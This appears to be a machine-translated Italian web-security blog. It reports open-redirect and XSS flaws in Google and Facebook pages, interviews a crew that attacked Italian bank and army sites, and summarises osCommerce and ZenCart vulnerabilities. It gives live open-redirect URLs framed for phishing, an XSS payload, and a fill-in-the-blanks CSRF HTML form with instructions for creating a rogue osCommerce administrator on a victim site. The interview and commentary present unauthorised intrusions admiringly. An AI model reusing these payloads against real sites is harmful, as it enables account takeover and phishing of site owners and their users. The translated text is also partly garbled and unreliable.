Capn3m0 WebSecurity

Some vulnerabilities have been identified recently in the pages of Google services and FaceBook. Open Redirect type are flaws that can perform a redirect without the need to manipulate strings or perform particular actions.

Open, in fact, indicates that the site suffers from this flaw does not exercise control on the input and executes the code so it is always planned. The advantage of being able to exploit this vulnerability as it is to be able to use url of domains that people does not question the origin (just Google) to make them click and redirettarli to phishing sites or similar.

Imagine the average user who receives a 'clone email from Google that shows him to click a url domain "google.com" and enter your data due to some plausible cause. Many would think that url hides a threat?

In this case the url affected by this vulnerability is belonging to the Service Google Accounts and is as follows:

https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.sitomalevolo.com

At present, the leak has been resolved and trying to redirect capn3m0.org you get an error "Bad Request":

https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org

This vulnerability was discovered by Ucha Gobejishvili aka longrifle0x which has only last week a series of XSS on sites of note: Google, Apple, Sony Ericcsson.

Always longrifle0x identified a XSS vulnerability in Google Apps for Business page. To test the vulnerability is necessary to go to the url:

https://www.google.com/a/cpanel/premier/new3?hl=en

and enter into the "Domain" this code:

<IFRAME SRC="javascript:alert('XSS');"> </ IFRAME>

Here his "curriculum"!

The second vulnerability, discovered by ZeRtOx group Devitel, FaceBook concerns and is always of the Open Redirect. The code is as follows:

and currently is still present as evidenced by the link that redirected to capn3m0.org:

http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.capn3m0.org

Finally I report a third vulnerability Always Open Redirect Services for Google: Ad Services. Adsense banners are associated with a url made ​​as follows:

http://www.googleadservices.com/pagead/aclk?
sa = L

& Num = 1
Cid = & 5GhoQFqmzEdFESSc_Vjf5Gxi
Mr. & = AOD64_2aoaqhlTxnKAENG806XtTTXpAjFw
& Client = ca-pub-XXXXXXXXXXXXXXXX
& = Adurl http://www.sitomalevolo.com

The parameters that receives inputs must all be correct except that instead of the field adurl is enhanced with links to where we want redirected.

As you can imagine finding a link with all the correct data is very simple. Just browse through the sites that show Google AdSense banner and copied the link.

This last flaw I found inspiration from the previous two while writing this article. If you know who spoke before me segnalatemelo that will placed to the author.

The staff of capn3m0.org has had the opportunity to interview pr0_alpha_team , emerging crew that has been noted in past days for having violated a number of institutional sites : the sites of small municipalities to the site of the Banca delle Marche, the Store of the defense site. esercito.it and many others.

How I chose the poster image from the film Hackers in 1995 whose protagonists were a crew of young guys a little 'fun for a while' passion for attacks carried out by disrupting a major city and ending up in the crosshairs of the FBI. The film, as we know, is fiction, but it was an inspiration to many kids like me who dreamed of becoming criminals or something.

The motto of the film was:

Their only crime was curiosity

(Their only crime was curiosity)

Knowing a little 'best of the boys pr0_alpha_team I came back to mind and see why.

Q # 1: - How did the pr0_alpha_team? It 'was a thing between friends like "let's see how far we can get" or structured and organized?

The 'Alpha_Team began as a group of boys (virtual friends), which challenges the infrastructure that today would be the safest, trying to draw attention to the Italians loved how vulnerable their systems and how private data can fall into the hands of ordinary people.

Q # 2 - The name pr0_alpha_team where it came from? You are a version of "alpha" then still unofficial? What can we expect?

So the name comes from Alpha_Team little imagination we had when we checked in on Zone-H , what should you expect? Well I hope for us that we still have fun in trying vulnerability

D # 3 - Looking at your profile on Zone-H s i hear of you, starting from November. You are a crew "emerging" or made some time ago but only now want to publish your actions?

Previously we function as individuals, but then one day we decided to unite and become the 'Alpha_Team and disclose our actions.

Q # 4 - your background? You are "ethical hacker" as a job?

We are all high school students in the future, but surely we want to work in that field, do not call ourselves hackers, but only enthusiast.

D # 5 - Independent or part of a larger project?

We are an independent group.

Q # 6 - Because corporate websites? What message would you like to send?

Attack important sites for fun and to make it clear to our dear webmaster how easy it is to exploit their weaknesses. For example, in 'attack on the Banca delle Marche wanted to understand how the webmaster has been easy for us to obtain sensitive information.

D # 7 - Until now, the illustrious victims were violated by SQL injection attacks. And 'the technique that you prefer or is that to which, as we have seen, all the victims were vulnerable?

Because in those sites we have found that kind of vulnerability.

Q # 8 - The silence of the press. The newspapers always latitano when the attack is not signed that Anonymous "makes audience." What do you think of this dis-information?

We think that today there is no dis-information, but little desire to get information from people using the internet. Everyone should know what risks face while surfing on the internet.

Q # 9 - The term hacker is still used incorrectly and are never made ​​distinctions between ethical, white hat, black hat, etc. .. You as you call yourself?

We're just young computer enthusiasts.

Q # 10 - The site of a bank, the site of the store of Defense ... your actions have once again brought into relief the technical deficiencies with regard to computer security. In Italy is still spending money to prevent a "bad habit" (unfortunately). If your victims informed of the breach as have reacted? The holes are then arranged?

Would react badly. As we can see in the banking system of the Marches we are dealing with a CMS for a fee, and I think they have not paid very little. No, the leaks are now as before.

To conclude this interview he reveals once again the lack of attention paid to computer security, our data and infrastructure that our country pays its most important or critical services. These guys, as I stated, quoting the movie "Hackers" are just fans and curious. The means and the skills they have and are showing how united we can achieve important objectives such as the site of a Bank or of the 'Army. They are not tied to any group "famous" and therefore the pr0_alpha_team few people talk about but, as they themselves have said they want to make known their actions.

On the subject of disinformation are correct remark by saying that nowadays with the internet available to anyone who is hard to think that people are evil or not at all informed. At least the journalists paid to "inform" could try to make the extra effort that we do not always have the time or manner of doing.

Finally, regarding the attack on the site of the Banca delle Marche ( bancadellemarche.it ) tell us that despite the money spent on a CMS result vulnerable (it can happen eh, no one doubts that there may be bugs) is not yet settled the flaw. These are among the news that all should give pause. Could a bank after finding violations in their data does not make headlines, and even in the short term remedy?

To err is human, but to persevere is diabolical ..

Following in the wake of news of recent times who have uncovered serious vulnerabilities for the latest versions of OsCommerce (2.3.1) and ZenCart (1.3.9h) could not miss the call even the latest alpha release 3.0.a5 osCommerce.

Developer of OsCommerce is a really bad time in less than a month since all the versions currently "stable" were pierced by multiple vulnerabilities. In the specific release, which we repeat this is an alpha, have been identified vulnerabilities Xss, Full Path Disclosure, Local File Inclusion and XSRF.

The Full Path Disclosure consists in asking some of OsCommerce Template files that go wrong, the screen shows the full path to their location on the server. With this information alone you can do little, but even in this case, if combined with other types of attacks becomes a useful information. The XSS allows to inject JavaScript code by exploiting a flaw in the file "products.php" while the Local File Inclusion allows you to retrieve files on the Server using the uninstall modules that CMS does not adequately verify the parameters passed and can accept input any path reachable.

Again there is a more serious flaw of the others and I believe is the XSRF that allows you to send commands to the application without these are verified in any way. In case you can create a new Admin sull'OsCommerce.

Simply create a page. "Html" containing the following code:

  <html>
 <body>
 <Form action = "http:// <sito vittima> / admin / index.php? Administrators & action = save" method = "post">
 <Input type = "text" name = "user_name" value = "<username>">
 <Input type = "text" name = "user_password" value = "<password>">
 <input type="text" name="modules[]" value="0?>
 <input type="hidden" name="subaction" value="confirm"/>
 <input type="submit" value="Save">
 </ Form>
 </ Body>
 </ Html> 

Obviously you need to change the following parameters:

<sito victim> with the domain of the site where you want to create an account

<username> with the username of the new Admin

<password> with the password to associate with the new Admin

Once created you can recall it from your Browser page and click "Save".

If everything was successful by accessing the url:

<sito vittima> http:// / admin /

You can log in as Admin with the data just entered.

For detailed information please refer to the link of Dr. Alberto Fontanella lead author.

osCommerce v3.0a5 [Multiple Vulnerabilities]

And 'now the custom that after the discovery of a new flaw for OsCommerce chain are identified the same (or almost) holes for ZenCart , another well-known CMS derived from the same OsCommerce.

The vulnerable version is the latest available ie 1.3.9h and presents various types of vulnerabilities: Full Path Disclosure, Reflected XSS and Stored XSS Arbitrary File Upload.

Full Path Disclosure Vulnerability allows, if the error handling is configured to display them, to know the absolute path of the application. In itself there is a flaw that allows any type of action but the information obtained may be useful if combined with attacks going to write on FileSystem or similar. The two XSS, however, does not affect the current 1.3.9h but all previous versions. The vulnerabilities are located in the "Quantity" of the carriage that allows the 'code injection and XSS Administrative Area "Location / Taxes". For the latter, therefore, it is assumed that you already have access Admin.

The latest vulnerabilities, the most serious, concerns the component Banner (banner_manager.php) that, as well as OsCommerce, allows to upload files that are saved in the folder "images".

For detailed information please refer to the link of Dr. Alberto Fontanella lead author.

Zen Cart <= v.1.3.9h [Multiple Vulnerabilities]

How ricordete the last time I was appointed the ecommerce OsCommerce on this site was to report a serious vulnerability in all versions. The flaw was present in different versions of OsCommerce ZenCart as derived by the same.

After 2 years, programmers, after a long inaction, have released 2 new versions: the new 2.3.1 and 3.0.1. The release of two new versions did not have much prominence and among users of this application a few have updated.

On May 14, however, a new flaw was discovered (unfortunately very similar to the previous one) that allows the upload of files in the folder "/ images" without having to use special techniques or steal data administrator.

[...]